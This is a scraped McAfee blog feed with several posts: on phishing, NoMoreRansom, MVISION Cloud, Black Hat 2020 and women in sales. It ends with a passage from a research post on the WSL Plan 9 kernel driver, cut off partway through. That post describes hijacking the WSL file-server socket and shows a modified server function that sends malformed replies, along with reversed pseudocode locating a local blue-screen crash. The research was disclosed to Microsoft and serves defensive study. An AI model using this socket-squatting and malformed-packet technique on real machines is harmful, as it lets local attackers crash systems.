If you receive an email or text asking you to take a certain action or download software, don’t click on anything within the message. Instead, go straight to the organization’s website. This will prevent you from downloading malicious content from phishing links.

Hover over links to see and verify the URL

If someone sends you a message with a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the message altogether.

Stay updated

To stay updated on all things McAfee  and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post How to Keep Your Data Safe From the Latest Phishing Scam appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/the-latest-phishing-scam/feed/ 0
Six Hundred Million Reasons to Celebrate: No More Ransom Turns FOUR!! https://www.mcafee.com/blogs/other-blogs/mcafee-labs/six-hundred-million-reasons-to-celebrate-no-more-ransom-turns-four/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/six-hundred-million-reasons-to-celebrate-no-more-ransom-turns-four/#respond Mon, 27 Jul 2020 17:05:17 +0000 /blogs/?p=103182

Happy Birthday! Today we mark the fourth anniversary of the NoMoreRansom initiative with over 4.2 million visitors, from 188 countries, stopping an estimated $632 million in ransom demands from ending up in criminals’ pockets. It would be fair to say that the initiative, which started in a small meeting room in the Hague, has been […]

The post Six Hundred Million Reasons to Celebrate: No More Ransom Turns FOUR!! appeared first on McAfee Blogs.

]]>

Happy Birthday! Today we mark the fourth anniversary of the NoMoreRansom initiative with over 4.2 million visitors, from 188 countries, stopping an estimated $632 million in ransom demands from ending up in criminals’ pockets. It would be fair to say that the initiative, which started in a small meeting room in the Hague, has been integral for so many in the perpetual fight against cybercriminals.

Powered by the contributions of its 163 partners the portal, which is available in 36 languages, has added 28 tools in the past year and can now decrypt 140 different types of ransomware infection. To think, just four years ago we started with only a handful of decryptors and partners. That speaks volumes to the commitment by all members to collaborate and work together to give victims a third option; #DontPay.

All this hard work took place in an ever-changing cybercriminal landscape; during those four years ransomware criminals shifted their tactics from “spray and pay”, mostly aimed at consumers, to highly organized crime groups actively seeking to paralyze complete organizations and extort them for astronomical amounts of money.

These challenges have not discouraged NoMoreRansom and its partners; on the contrary, having a strong public private partnership between Law Enforcement and the Private sector has proven essential in several (ongoing) investigations. Without a doubt, we will be the first to admit that fighting ransomware has not been easy but that should not stop us from doing things that are hard.

We are delighted to continue supporting this initiative and play our part in fighting this global problem. However, we have to stress that the fight against ransomware is far from over, in fact we need more collaborative initiatives to combat the rise in malicious activity.  Also, there are still many individuals and organizations that do not even know about NoMoreRansom. Even within the information security industry there are those who have not heard about the availability of free decryption tools.

Please share the message: #DontPay #NoMoreRansom

The post Six Hundred Million Reasons to Celebrate: No More Ransom Turns FOUR!! appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/six-hundred-million-reasons-to-celebrate-no-more-ransom-turns-four/feed/ 0
Introducing MITRE ATT&CK in MVISION Cloud: Defend with Precision https://www.mcafee.com/blogs/enterprise/cloud-security/introducing-mitre-attck-in-mvision-cloud-defend-with-precision/ https://www.mcafee.com/blogs/enterprise/cloud-security/introducing-mitre-attck-in-mvision-cloud-defend-with-precision/#respond Mon, 27 Jul 2020 16:50:05 +0000 /blogs/?p=103164

The latest innovation in MVISION Cloud, the multi-cloud security platform for enterprise, introduces MITRE ATT&CK into the workflow for SOC analysts to investigate cloud threats and security managers to defend against future attacks with precision. Most enterprises use over 1,500 cloud services, generating millions of events, from login, to file share, to download and an […]

The post Introducing MITRE ATT&CK in MVISION Cloud: Defend with Precision appeared first on McAfee Blogs.

]]>

The latest innovation in MVISION Cloud, the multi-cloud security platform for enterprise, introduces MITRE ATT&CK into the workflow for SOC analysts to investigate cloud threats and security managers to defend against future attacks with precision.

Most enterprises use over 1,500 cloud services, generating millions of events, from login, to file share, to download and an infinite number of actions meant for productivity yet exploited by adversaries. Until now, hunting for adversary activity within that haystack has been an arduous effort, with so much noise that many data breaches have gone unnoticed until it is too late.

MVISION Cloud takes a multi-layered approach to cloud threat investigation that can speed your time to detect adversary activity in your cloud services, identify gaps, and implement targeted changes to your policy and configuration.

First, the haystack of events is processed continuously against a baseline of known good behavior by User and Entity Behavior Analytics (UEBA) to identify the anomalies and actual threats in your environment, assessing behavior across multiple services and accounts.

Events processed by UEBA determined to be a compromised account

Events processed by UEBA determined to be a compromised account 

This takes your investigation process down to a manageable quantity of incidents. With this release, those incidents are now in the same language as the rest of the SOC – MITRE ATT&CK. Each cloud security incident is mapped to ATT&CK tactics and techniques, showing you adversary activity currently being executed in your environment.  

Multi-cloud MITRE ATT&CK view of adversary activity in MVISION Cloud

Multi-cloud MITRE ATT&CK view of adversary activity in MVISION Cloud 

You have three views within MVISION Cloud:  

  • Retrospective: viewing all adversary techniques that have already occurred in your environment 
  • Proactive: viewing attacks in progress, that you can take action to stop  
  • Full kill-chain: viewing a combination of incidents, anomalies, threats, and vulnerabilities into a holistic string of infractions.  

Multiple teams in your organization benefit from this addition to MVISION Cloud:  

  • SecOps Teams Advance from Reactive to Proactive: McAfee MVISION Cloud allows analysts to visualize not only executed threats in the ATT&CK framework, but also potential attacks they can stop across multiple Software-as-a-Service (SaaS), Platform-as-a-Service (PaaS) and Infrastructure-as-a-Service (IaaS) environments 
  • SecOps Teams Break Silos: SecOps teams can now bring pre-filtered cloud security incidents into their Security Information Event Management (SIEM)/Security Orchestration, Automation and Response (SOAR) platforms via API, mapped to the same ATT&CK framework they use for endpoint and network threat investigation  
  • Security Managers Defend with Precision: McAfee MVISION Cloud now takes Cloud Security Posture Management (CSPM) to a new level, providing security managers with cloud service configuration recommendations for SaaS, PaaS and IaaS environments, which address specific ATT&CK adversary techniques 

With McAfee, threat investigation isn’t just for one environment – it is for all of your environments, from cloud to endpoint and your analytics platforms. With McAfee MVISION CloudMVISION EDRand MVISION Insights, your enterprise has an extended detection and response (XDR) platform for the heterogenous attacks you face today.

Cloud Threat Investigation 101: Hunting with MITRE ATT&CK

The leading SecOps teams use MITRE ATT&CK. Now, Cloud threat investigation speaks the same language with ATT&CK built into MVISION Cloud, unlocking new, precise methods for Cloud defense.

Download Now

The post Introducing MITRE ATT&CK in MVISION Cloud: Defend with Precision appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/cloud-security/introducing-mitre-attck-in-mvision-cloud-defend-with-precision/feed/ 0
Virtually Impossible to Miss McAfee at Black Hat 2020 https://www.mcafee.com/blogs/enterprise/virtually-impossible-to-miss-mcafee-at-black-hat-2020/ https://www.mcafee.com/blogs/enterprise/virtually-impossible-to-miss-mcafee-at-black-hat-2020/#respond Fri, 24 Jul 2020 16:30:18 +0000 /blogs/?p=103134

Black Hat 2020 is going virtual this year, providing attendees with the latest security research, development, and trends. Every year McAfee presents our latest security research and this year promises to be innovative and informative! You can expect insightful new findings from the McAfee Advanced Threat Research team. Also join us at the virtual booth […]

The post Virtually Impossible to Miss McAfee at Black Hat 2020 appeared first on McAfee Blogs.

]]>

Black Hat 2020 is going virtual this year, providing attendees with the latest security research, development, and trends. Every year McAfee presents our latest security research and this year promises to be innovative and informative! You can expect insightful new findings from the McAfee Advanced Threat Research team. Also join us at the virtual booth to shift your cybersecurity left with new SOC solutions and check out McAfee’s advanced device-to-cloud security solutions.

Here’s where you can see McAfee in action online August 1-6:

What should attendees expect from McAfee at Black Hat USA?

Chief Scientist and McAfee Fellow, Raj Samani spoke with Black Hat in an executive spotlight interview saying “Every year we present our latest security research and this year promises to be out of this world!! Ahem… I don’t want to give too much away but you can expect some tremendous new findings from the McAfee Advanced Threat Research team. Also, get ready for more SOC options from McAfee with a unique solution that shifts cybersecurity left, as well as even more advanced device to cloud protection.”

Read the full interview here.

Session Title: Balancing The Tug of War: How CIOs and CISOs Can Partner for Better IT

Wednesday, August 5, 10am – 10:20am PT

Speakers: McAfee CIO Scott Howitt, and CISO Arve Kjoelen

The rapid evolution of the digital world has driven great technology innovation and  spawned growth in cyberthreats that range from the annoying to the catastrophic. In today’s IT environment both CIOs and CISOs are integral to the success of any organization. Historically, there has been tension between the two as they both work to balance the needs of the organization to stay on top of technology while securely implementing tools.

These roles are interdependent, since the CIO relies upon the CISO for advice, guidance and risk evaluation while the CISO depends on the CIO for support and infrastructure resources. They must work together with a holistic, integrated approach that empowers every business department within the organization with a clear vision. Information security is no longer an IT support issue, but a strategic business responsibility. Both IT executives must share common goals for security and IT operations to be successful.

In this session, McAfee CIO Scott Howitt, and CISO Arve Kjoelen will explore the tension between these key roles, how to utilize the positive and alleviate the negative effects of that tension and offer practical advice on how CIOs and CISOs can most effectively work together to ensure the needs of the organization are securely met.

Session Title: “Model Hack the Planet” – A New Frontier in Threat Research for Intelligent Systems

Session Available: Wednesday, August 5, 8:30amPT,  ends Thursday, August 6, 4:30PM PT

Speaker: Steve Povolny, Head of McAfee Advanced Threat Research, McAfee

The leading edge of analytic technologies presents a new frontier to security researchers. To address this expanding attack surface, researchers are partnering with data scientists to “model hack,” exposing weaknesses in machine learning models — before attackers do. This talk covers the state of model hacking, introducing new research and progress being made to address issues.

Virtual Expo

Visit the McAfee virtual booth, watch our demo videos, and tweet for a chance to win a gift certificate. (There will be one winner per demo station, who will be randomly selected at the end of the day.)

Be sure to follow @McAfee for real-time updates from the show throughout the week.

 

 

 

The post Virtually Impossible to Miss McAfee at Black Hat 2020 appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/virtually-impossible-to-miss-mcafee-at-black-hat-2020/feed/ 0
Women in Sales Part 1: Opportunities for Women Across Cybersecurity Sales https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/women-in-sales-part-1-opportunities-for-women-across-cybersecurity-sales/ https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/women-in-sales-part-1-opportunities-for-women-across-cybersecurity-sales/#comments Thu, 23 Jul 2020 18:47:59 +0000 /blogs/?p=103101

Collaborative, inclusive teams are what redefine cybersecurity solutions for every aspect of our connected world. At McAfee, women are making a significant impact in cybersecurity, including all aspects of sales.   Executive vice president of global sales and marketing, Lynne Doherty, shares her perspective on the importance of inclusion and leads us into the start of our Women in Sales series: “Fostering inclusion […]

The post Women in Sales Part 1: Opportunities for Women Across Cybersecurity Sales appeared first on McAfee Blogs.

]]>

Collaborative, inclusive teams are what redefine cybersecurity solutions for every aspect of our connected world. At McAfee, women are making a significant impact in cybersecurity, including all aspects of sales.  

Executive vice president of global sales and marketing, Lynne Doherty, shares her perspective on the importance of inclusion and leads us into the start of our Women in Sales series: “Fostering inclusion and diversity remains a key ingredient for business success. With the vast benefits to successfully hiring and retaining a workforce shaped by different perspectives, it is predicted that 75 percent of businesses with diverse frontline decision-making teams will exceed their financial targets through 2022. [Gartner, 2019] – Thus proving that inclusion and diversity isn’t just good for company culture, it’s good for business.

“Today, businesses recognize work remains to diversify technology sales. A part of that effort includes a focus on increasing gender diversity right here at McAfee. Opportunities exist for women of varying skillsets and interests across our global sales organization — from sales operations, inside sales, field sales and channel sales to sales engineering.

“Below, meet some of the talented women in sales who have succeeded at McAfee. In this first feature, women share their perspectives on how they continue to break boundaries and achieve success in tech sales.”

Meet McAfee’s Women in Sales

“As women, we have been gaining much more space in the professional world, and companies like McAfee are where we are increasingly more relevant. The sector is evolving, and the market and opportunities are growing. As long as women continue to prepare themselves, starting from time spent in school, and understand that this is a good opportunity to develop, we will improve the statistics. McAfee is a company that promotes (women in management) and it shows, even in the selection processes. I really appreciate this at McAfee.”

— Andrea, Enterprise Sales, Bogotá, Colombia

“Many women think you have to be technical to be in tech sales and that isn’t true. I came to McAfee understanding sales and relationship management. Since being here, I’ve focused on upping my security and technology knowledge. I’ve found not being too technical allows me to listen more to the customer and focus on the desired business outcome. Often, the engineers can get deep into the technology, but I think it’s important to be the intermediary; I stay in the ‘forest’ not the trees.”

—Ashley, Consumer Sales, Richmond, Virginia

“We need to ensure women have the confidence to apply for the roles within IT. I encourage women to move outside your comfort zone and shrug off stigmas. We are more than entitled to sit at this table.”

—Eadaoin, Inside Sales, Cork, Ireland

“In the corporate world, women face challenges from many different angles. Often, I may be the only woman in a room or on my teams, but my advice would be to remain confident and not to second guess your position or authority. While I may be the only woman many times, I also am often the only woman of color, which makes it even more important we continue to advocate for representation. Diversity comes in all forms and quite frankly is necessary because it brings a unique value to a team. At the start of my career, I learned the importance of demonstrating my skills and that I shouldn’t shy away, hold back or “wait for my turn” which has been advantageous when an opportunity presents itself.”

—Jardin, Inside Sales, Plano, Texas

“Sales has changed considerably in the 20 years I’ve worked in tech.  In an early role, I was told a man would never buy from a woman. I was inspired to prove that wrong. These days the environment is entirely different. McAfee, like many companies, has zero tolerance for such conduct or mindset. The culture is positive, inclusive and one where anyone can succeed. Each of us has a responsibility to show future generations that cybersecurity is a great career option for all.”

—Katie, Enterprise Sales, Cheltenham, England

“I see the two primary challenges for women in tech sales as perception and awareness. There is a traditional view that you must be technical to work in technology. I‘m not naturally technical, and I always assumed you had to have a technical background like coding or programming. And, that is not the case so. You can learn technology if you have all the other skills that make a great salesperson.”

—Krista, Enterprise Sales, Detroit, Michigan

“In terms of numbers, while we’re making progress, I’d love for us to see more women in tech, especially in sales. This is why mentoring, sponsorship and support for women in sales is so important – whether as the customer or the vendor. When you and your customer have things in common like gender, culture and experience it helps to strengthen the relationship and sales process.”

—Kristol, Inside Sales, Plano, Texas

“In my previous experiences, I’ve been one of the only women at the table. I would tell women not to get discouraged by this; it is about finding the right company for you. Find what makes you happy to get up every day to be part of it.”

—Paige, Sales Operations, Plano, Texas

“Historically, I was the only woman in the room, but things have definitely changed! Women may too quickly dismiss technology as a career, but in sales, it’s all about finding a solution for your customer, and women have amazing skillsets to do that.”

—Brenda, Consumer Sales, Vancouver, British Columbia

Learn more about how McAfee women in our sales organization leverage their skillsets for a successful career in our upcoming blog.

Interested in joining a company that supports inclusion and belonging? Search our jobs. Subscribe to Job Alerts.

The post Women in Sales Part 1: Opportunities for Women Across Cybersecurity Sales appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/women-in-sales-part-1-opportunities-for-women-across-cybersecurity-sales/feed/ 1
Hunting for Blues – the WSL Plan 9 Protocol BSOD https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hunting-for-blues-the-wsl-plan-9-protocol-bsod/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hunting-for-blues-the-wsl-plan-9-protocol-bsod/#respond Thu, 23 Jul 2020 14:53:58 +0000 /blogs/?p=102882

Windows Subsystem for Linux Plan 9 Protocol Research Overview This is the final blog in the McAfee research series trilogy on the Windows Subsystem for Linux (WSL) implementation – see The Twin Journey (part 1) and Knock, Knock–Who’s There (part 2). The previous research discussed file evasion attacks when the Microsoft P9 server can be […]

The post Hunting for Blues – the WSL Plan 9 Protocol BSOD appeared first on McAfee Blogs.

]]>

Windows Subsystem for Linux Plan 9 Protocol Research Overview

This is the final blog in the McAfee research series trilogy on the Windows Subsystem for Linux (WSL) implementation – see The Twin Journey (part 1) and Knock, Knock–Who’s There (part 2). The previous research discussed file evasion attacks when the Microsoft P9 server can be hijacked with a malicious P9 (Plan 9 File System Protocol) server. Since Windows 10 version 1903, it is possible to access Linux files from Windows by using the P9 protocol. The Windows 10 operating system comes with the P9 server as part of the WSL install so that it can communicate with a Linux filesystem. In this research we explore the P9 protocol implementation within the Windows kernel and whether we could execute code in it from a malicious P9 server. We created a malicious P9 server by hijacking the Microsoft P9 server and replacing it with code we can control.

In a typical attack scenario, we discovered that if WSL is enabled on Windows 10, then a non-privileged local attacker can hijack the WSL P9 communication channel to cause a local Denial of Service (DoS) or Blue Screen of Death (BSOD) in the Windows kernel. It is not possible to achieve escalation of privilege (EoP) within the Windows kernel due to this vulnerability; the BSOD appears to be as designed by Microsoft within their legitimate fail flow, if malformed P9 server communication packets are received by the Windows kernel. A non-privileged user should not be able to BSOD the Windows kernel, from a local or remote perspective. If WSL is not enabled (disabled by default on Windows 10), the attack can still be executed but requires the attacker to be a privileged user to enable WSL as a pre-requisite.

There have recently been some critical, wormable protocol vulnerabilities within the RDP and SMB protocols in the form of Bluekeep and SMBGhost. Remotely exploitable vulnerabilities are very high risk if they are wormable as they can spread across systems without any user interaction. Local vulnerabilities are lower risk since an attacker must first have a presence on the system; in this case they must have a malicious P9 server executing. The P9 protocol implementation runs locally within the Windows kernel so the objective, as with most local vulnerability hunting, is to find a vulnerability that allows an escalation of privilege (EoP).

In this blog we do a deep dive into the protocol implementation and vulnerability hunting process. There is no risk to WSL users from this research, which has been shared with and validated by Microsoft. We hope this research will help improve understanding of the WSL P9 communications stack and that additional research would be more fruitful further up the stack.

There have been some exploits on WSL such as here and here but there appears to be no documented research of the P9 protocol implementation other than this.

P9 Protocol Overview

The Plan 9 File System Protocol server allows a client to navigate its file system to create, remove, read and write files. The client sends requests (T-messages) to the server and the server responds with R-messages. The P9 protocol has a header consisting of size, type and tag fields which is followed by a message type field depending on the request from the client. The R-message type sent by the server must match the T-message type initiated from the client. The maximum connection size for the data transfer is decided by the client during connection setup; in our analysis below, it is 0x10000 bytes.

P9 protocol header followed by message type union (we have only included the subset of P9 message types which are of interest for vulnerability research):

struct P9Packet {

u32                         size;

u8                           type;

u16                         tag;

union {

struct p9_rversion rversion;

struct p9_rread rread;

struct p9_rreaddir rreaddir;

struct p9_rwalk rwalk;

} u

} P9Packet

The P9 T-message and corresponding R-message numbers for the types we are interested in (the R-message is always T-message+1):

enum p9_msg_t {

P9_TREADDIR = 40,

P9_RREADDIR = 41,

P9_TVERSION = 100,

P9_RVERSION = 101,

P9_TWALK = 110,

P9_RWALK = 111,

P9_TREAD = 116,

P9_RREAD = 117,

}

At the message type layer, which follows the P9 protocol header, you can see the fields, which are of variable size, highlighted below:

struct p9_rwalk {

u16 nwqid;

struct p9_qid wqids[P9_MAXWELEM];

}

 

struct p9_rread {

u32 count;

u8 *data;

}

 

struct p9_rreaddir {

u32 count;

u8 *data;

}

 

struct p9_rversion {

u32 msize;

struct p9_str version;

}

 

struct p9_str {

u16 len;

char *str;

}

Based on the packet structure of the P9 protocol we need to hunt for message type confusion and memory corruption vulnerabilities such as out of bounds read/write.

So, what will a packet structure look like in memory? Figure 1 shows the protocol header and message type memory layout from WinDbg. The message size (msize) is negotiated to 0x10000 and the version string is “9P2000.W”.

Figure 1. P9 packet for rversion message type

Windows WSL P9 Communication Stack and Data Structures

Figure 2. Windows Plan 9 File System Protocol Implementation within WSL

The p9rdr.sys network mini-redirector driver registers the “\\Device\\P9Rdr” device with the Redirected Drive Buffering Subsystem (RDBSS) using the RxRegisterMinirdr API as part of the p9rdr DriverEntry routine. During this registration, the following P9 APIs or driver routines are exposed to the RDBSS:

P9NotImplemented

P9Start

P9Stop

P9DevFcbXXXControlFile

P9CreateSrvCall

P9CreateVNetRoot

P9ExtractNetRootName

P9FinalizeSrvCall

P9FinalizeVNetRoot

P9Create

P9CheckForCollapsibleOpen

P9CleanupFobx

P9CloseSrvOpen

P9ForceClosed

P9ExtendFile

P9Flush

P9QueryDirectoryInfo

P9QueryVolumeInfo

P9QueryFileInfo

P9SetFileInfo

P9IsValidDirectory

P9Read

P9Write

The p9rdr driver is not directly accessible from user mode using the DeviceIoControl API and all calls must go through the RDBSS.

As seen in Figure 2, when a user navigates to the WSL share at “\\wsl$” from Explorer, the RDBSS driver calls into the P9 driver through the previously registered APIs.

DIOD is a file server implementation, that we modified to be a “malicious” P9 server, where we claim the “fsserver” socket name prior to the Windows OS in a form of squatting attack. Once we replaced the Microsoft P9 server with the DIOD server, we modified the “np_req_respond” function (explained in the fuzzing constraints section) so that we could control P9 packets to send malicious responses to the Windows kernel. Our malicious P9 server and socket hijacking have been explained in detail here.

So now we know how data travels from Explorer to the P9 driver but how does the P9 driver communicate with the malicious P9 server? They communicate over AF_UNIX sockets.

There are two important data structures used for controlling data flow within the P9 driver called P9Client and P9Exchange.

The P9Client and P9Exchange data structures, when reverse engineered to the fields relevant to this research, look like the following (fields not relevant to this analysis have been labelled as UINT64 for alignment):

typedef struct P9Client {
PVOID * WskTransport_vftable
PVOID * GlobalDevice
UNINT64 RunRef
WskSocket *WskData
UINT64
UINT64
UINT_PTR
PVOID *MidExchangeMgr_vftable
PRDBSS_DEVICE_OBJECT *RDBSS
UINT64
PVOID **WskTransport_vftable
PVOID **MidExchangeMgr_vftable
P9Packet *P9PacketStart
UINT64 MaxConnectionSize
UINT64 Rmessage_size
P9Packet *P9PacketEnd
UINT_PTR
UINT64
UINT64
UINT_PTR
UINT64
UINT64
PVOID * Session_ReconnectCallback
PVOID ** WskTransport_vftable
UINT64
UINT_PTR
UINT_PTR
UINT64
UINT_PTR
UINT64
UINT64
UINT64
} P9Client

P9Client data structure memory layout in WinDbg:

typedef struct P9Exchange {
UINT64
UINT64
P9Client *P9Client
UINT64 Tmessage_type
UINT64
UINT_PTR
PVOID *Lambda_PTR1
PVOID *Lambda_PTR2
PRX_CONTEXT *RxContextUINT64 Tmessage_size
UINT64
UINT64
UINT64
UINT64
UINT64
UINT64
} P9Exchange

The P9Exchange data structure layout in WinDbg:

To communicate with the P9 server, the P9 driver creates an I/O request packet (IRP) to receive data from the Winsock Kernel (WSK). An important point to note is that the Memory Descriptor List (MDL) used to hold the data passed between the P9 server and Windows kernel P9 client is 0x10000 bytes (the max connection size mentioned earlier).

virtual long WskTransport::Receive(){

UNINT64 MaxConnectionSize = 0x10000;

P9_IRP_OBJECT = RxCeAllocateIrpWithMDL(2, 0, 0i64);

P9_MDL = IoAllocateMdl(P9Client->P9PacketStart, MaxConnectionSize, 0, 0, 0i64);
void MmBuildMdlForNonPagedPool(P9_MDL);
P9_IRP_OBJECT->IoStackLocation->Parameters->MDL = &P9_MDL;

P9_IRP_OBJECT->IoStackLocation->Parameters->P9Client = &P9Client;

P9_IRP_OBJECT->IoStackLocation->Parameters->DataPath = &P9Client::ReceiveCallback;
P9_IRP_OBJECT->IoStackLocation->CompletionRoutine = p9fs::WskTransport::SendReceiveComplete
WskProAPIReceive (*WskSocket, *P9_MDL, 0, *P9_IRP_OBJECT);
}

The MDL is mapped to the P9PacketStart field address within the P9Client data structure.

On IRP completion, the WskTransport::SendReceiveComplete completion routine is called to retrieve the P9Client structure from the IRP to process the P9 packet response from the server:

int static WskTransport::SendreceiveComplete(IRP *P9_IRP_OBJECT){

P9Client = &P9_IRP_OBJECT->IoStackLocation->Parameters->P9Client;

P9Client::ReceiveCallback(P9Client* P9Client);

}

The P9Client data structure is used within an IRP to receive the R-message data but what is the purpose of the P9Exchange data structure?

  1. When the P9 driver sends a T-message to the server, it must create an exchange so that it can track the state between the message type sent (T-message) and that returned by the server (R-Message).
  2. It contains lambda functions to execute on the specific message type. The Tmessage_type field within the P9Exchange data structure ensures that the server can only send R-messages to the same T-message type it received from the P9 driver.
  3. PRX_CONTEXT * RxContext structure is used to transfer data between Explorer and the p9rdr driver via the RDBSS driver.

The flow of a WALK T-message can be seen below:

Within the P9Client::CreateExchange function, the MidExchangeManager::RegisterExchange is responsible for registering the P9Exchange data structure with the RDBSS using a multiplex ID (MID) to distinguish between concurrent server and client requests.

MidExchangeManager::RegisterExchange (*P9Client, *P9Exchange){

NTSTATUS RxAssociateContextWithMid (PRX_MID_ATLAS P9Client->RDBSS, PVOID P9Exchange, PUSHORT NewMid);

}

The important fields within the P9Client and P9Exchange data structures which we will discuss further during the analysis:

  1. PClient->MaxConnectionSize – set at the start of the connection and cannot be controlled by an attacker
  2. P9Client->P9PacketStart – points to P9 packet received and can be fully controlled by an attacker
  3. P9Client->Rmessage_size –can be fully controlled by an attacker
  4. P9Exchange->Tmessage_type – set during T-message creation and cannot be controlled by an attacker
  5. P9Exchange->RxContext – used to pass data from P9 driver through the RDBSS to Explorer

Now that we know how the protocol works within the Windows kernel, the next stage is vulnerability hunting.

Windows Kernel P9 Server Vulnerability Hunting

P9 Packet Processing Logic

From a vulnerability perspective we want to audit the Windows kernel logic within p9rdr.sys, responsible for parsing traffic from the malicious P9 server. Figure 3 shows the source of the P9 packet and the sink, or where the packet processing completes within the p9rdr driver.

Figure 3. Windows Kernel Processing layers for the P9 protocol malicious server response parsing

Now that we have identified the code for parsing the P9 protocol message types of interest we need to audit the code for message type confusion and memory corruption vulnerabilities such as out of bounds read/write and overflows.

Fuzzing constraints

There were a number of constraints which made deploying automated fuzzing logic difficult:

  1. The R-message type sent from the malicious P9 server must match the T-message type sent by the Windows kernel
  2. Timeouts in higher layers of the WSL stack

The above challenges could, however, be overcome but since the protocol is relatively simple we decided to focus on reversing the processing logic validation. To verify the processing logic validation, we created some manual fuzzing capability within the malicious P9 server to test the variable length packet field boundaries identified from the protocol overview.

Below is an example RREAD R-message type which sends a malicious P9 packet in response to an RREAD T-message where we control the count and data variable length fields.

srv.c

void

np_req_respond(Npreq *req, Npfcall *rc)

{

NP_ASSERT (rc != NULL);

xpthread_mutex_lock(&req->lock);

 

u32 count = 0xFFFFFFFF;

Npfcall *fake_rc;

u8 *data = malloc(0xFFF0);

memset(data, “A”, 0xFFF0);

 

if (!(fake_rc = np_alloc_rread1(count)))

return NULL;

if (fake_rc->u.rread.data)

memmove(fake_rc->u.rread.data, data, count);

 

if(rc->type == 0x75){

fprintf (stderr, “RREAD Packet Reply”);

req->rcall = fake_rc;

}

else{

req->rcall =rc;

}

if (req->state == REQ_NORMAL) {

np_set_tag(req->rcall, req->tag);

np_conn_respond(req);

}

xpthread_mutex_unlock(&req->lock);

}

Validation Checks

The data passed to the P9 driver is contained within a connection memory allocation of 0x10000 bytes (P9Client->P9PacketStart) and most of the processing is done within this memory allocation, with two exceptions where memmove is called within the P9Client::FillData and P9Client::Lambda_2275 functions (discussed below).

A message-type confusion attack is not possible since the P9Exchange data structure tracks the R-message to its corresponding T-message type.

In addition, the P9 driver uses a span reader to process message type fields of static length. The P9Exchange structure stores the message type which is used to determine the number of fields within a message during processing.

While we can control the P9 packet size we cannot control the P9Client->MaxConnectionSize which means messages greater than or equal to 0x10000 will be dropped.

All variable size field checks within the message type layer of the protocol are checked against the P9Packet size field ensuring that a malicious field will not result in out of bounds read or write access outside of the 0x10000 connection memory allocation.

The processing logic functions identified previously were reverse engineered to understand the validation on the protocol’s fields, with specific focus on the variable length fields within message types rversion, rwalk and rread.

By importing the P9Client and P9Exchange data structures into IDA Pro, the reverse engineering process relatively straight forward to understand the packet validation logic. The functions below have been reversed to the level required for understanding the validation and are not representative of the entire function code base.

P9Client::ReceiveCallback validates that the Rmessage_size does not exceed the max connection size of 0x10000

void P9Client::ReceiveCallback ( P9Client *P9Client){
struct p9packet;uint64 MaxConnectionSize;uint64 Rmessage_size;MaxConnectionSize = P9Client-> MaxConnectionSize;
Rmessage_size = P9Client->Rmessage_size;if(MaxConnectionSize) {
P9Packet = (struct p9packet *) P9Client-> P9PacketStart;if (MaxConnectionSize < 0 || !P9Packet) terminate(P9Packet);}if (Rmessage_size >=0 && P9Client->MaxConnectionSize >= Rmessage_size)
{
P9Client::HandleReply (*P9Client)
} else{

terminate(P9Packet);

}

P9Client::HandleReply – there are multiple local DoS here which result in a Blue Screen Of Death (BSOD) depending on the size of P9Client->Rmessage_size and P9Client->P9PacketEnd->size, e.g. when P9Client->P9PacketEnd->size is zero terminate() is called which is BSOD.

void P9Client::HandleReply(P9Client *P9Client){

uint64 P9PacketHeaderSize = 7;

uint64 Rmessage_size = P9Client->Rmessage_size;

if (Rmessage_size >=7){
while(1){

P9PacketEnd = P9Client->P9PacketEnd;

if(!P9PacketEnd) break;

uint64 P9PacketSize = P9Client->P9PacketEnd->size;
if (P9PacketSize > P9Client->MaxConnectionSize); HandleIoError();

if (Rmessage_size < P9PacketSize); P9Client::FillData();

if(Rmessage_size < 4) terminate(); // checking a P9 header size field exists in packet

if(Rmessage_size > 5) fastfail(); // checking a P9 header type field exists in packet

int message_type = P9PacketEnd->type;

if(Rmessage_size < 7) fastfail(); // checking a P9 header tag field exists in packet

uint64 tag = P9PacketEnd->tag;

uint64 P9message_size = P9PacketSize – P9PacketHeaderSize; //getting size of message

if (Rmessage_size – 7 < 0) terminate(); // checking message layer exists after P9 header

if (Rmessage_size – 7 < P9message_size); terminate();  //BSOD here as when set P9PacketSize = 0 then subtracting 7 wraps around so P9message_size becomes greater than Rmessage_size.

void P9Client::ProcessReply(P9Client *P9Client, Rmessage_type, tag, &P9message_size);

}

}

else {

P9Client::FillData();

}

P9Client::FillData – we cannot reach this function with a large Rmessage_size to force an out of bounds write.

int P9Client::FillData (P9Client *P9Client){
uint64 Rmessage_size = P9Client-> Rmessage_size;uint_ptr P9PacketEnd = P9Client->P9PacketEnd;
uint_ptr P9PacketStart = P9Client->P9PacketStart;if (P9PacketEnd != P9PacketStart) {
memmove (P9PacketStart, P9PacketEnd, Rmessage_size);
}

ProcessReply checks the R-message type with that from the T-message within the P9Exchange data structure.

void P9Client::ProcessReply(P9Client *P9Client, Rmessage_type, tag, &P9message_size){
P9Exchange *P9Exchange = MidExchangeManager::FindAndRemove(*P9Client, &P9Exchange);if (P9Packet->tag > 0) {
int message_type_size = GetMessageSize (P9Exchange->Tmessage_type);
if (P9message_size >= message_type_size) {int rmessage_type = P9Exchange->MessageType;int rmessage_type = rmessage_type +1;}
if(rmessage_type > 72){
Switch (MessageType){
case 100:
P9Client::ProcessVersionReply(P9Client *P9Client, P9Exchange, &P9message_size);
case 110:
P9Client::ProcessWalkreply(Rmessage_type, P9Exchange, &P9message_size);}
}else {
P9Client::ProcessReadReply(rmessage_type, P9Exchange, &P9message_size);
}}

During the P9Client::ProcessReply function it calls MidExchangeManager::FindAndRemove to fetch the P9Exchange data structure associated with the R-messages corresponding T-message.

MidExchangeManager::FindAndRemove (*P9Client, &P9Exchange){

